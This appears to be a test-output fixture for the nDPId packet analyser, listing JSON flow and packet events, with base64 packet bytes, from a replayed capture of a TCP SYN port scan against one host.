+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jUAACkGQT2sEAAIQA2GNIzSwAndUoMYAAAAAGACCABwhQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4bMAACsGO7+sEAAIQA2GNIzSBDndUoMYAAAAAGACEAAkVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0gAADYGSyqsEAAIQA2GNIzSCcTdUoMYAAAAAGACDAAiywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsMJQAADkG3t6sEAAIQA2GNIzSGafdUoMYAAAAAGACCAAW6AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsmh8AADkGdVOsEAAIQA2GNIzSBAndUoMYAAAAAGACCAAshgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsyJIAAC0GUuCsEAAIQA2GNIzSAnfdUoMYAAAAAGACCAAuGAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsRs4AAC8G0qSsEAAIQA2GNIzSAojdUoMYAAAAAGACEAAmBwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYAYAAC0Gu2ysEAAIQA2GNIzSB9LdUoMYAAAAAGACCAAovQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ0cAACsGtiusEAAIQA2GNIzSAVTdUoMYAAAAAGACEAAnOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsgsYAADsGiqysEAAIQA2GNIzSHQvdUoMYAAAAAGACEAALhAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsnEMAACsGgS+sEAAIQA2GNIzSGojdUoMYAAAAAGACEAAOBwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYIUAAC0Guu2sEAAIQA2GNIzSAw\/dUoMYAAAAAGACCAAtgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAs5r4AAC4GM7SsEAAIQA2GNIzSBHvdUoMYAAAAAGACDAAoFAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060701,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_packet_id":1,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060701,"pkt":"ACYLMQczACWzv5HuCABFAAAsVaQAADQGvs6sEAAIQA2GNIzS0x3dUoMYAAAAAGACBABhcQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_packet_id":1,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060743,"pkt":"ACYLMQczACWzv5HuCABFAAAs3tQAACgGQZ6sEAAIQA2GNIzTwBfdU4MZAAAAAGACBAB0dAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsp9QAACoGdp6sEAAIQA2GNIzTH5HdU4MZAAAAAGACDAAM+wAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAssgkAAC4GaGmsEAAIQA2GNIzTzcHdU4MZAAAAAGACDABeygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsOvEAACYG54GsEAAIQA2GNIzTG1zdU4MZAAAAAGACDAARMAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzcAACwGtTusEAAIQA2GNIzTatjdU4MZAAAAAGACBADJswAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs9\/IAADoGFoCsEAAIQA2GNIzTHRPdU4MZAAAAAGACDAAPeQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsc2kAAC4GpwmsEAAIQA2GNIzTE4zdU4MZAAAAAGACDAAZAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsV7wAADIGvrasEAAIQA2GNIzTCpbdU4MZAAAAAGACDAAh9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs1zgAADUGPDqsEAAIQA2GNIzTCbzdU4MZAAAAAGACCAAm0AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsUiMAADkGvU+sEAAIQA2GNIzTA+jdU4MZAAAAAGACCAAspAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 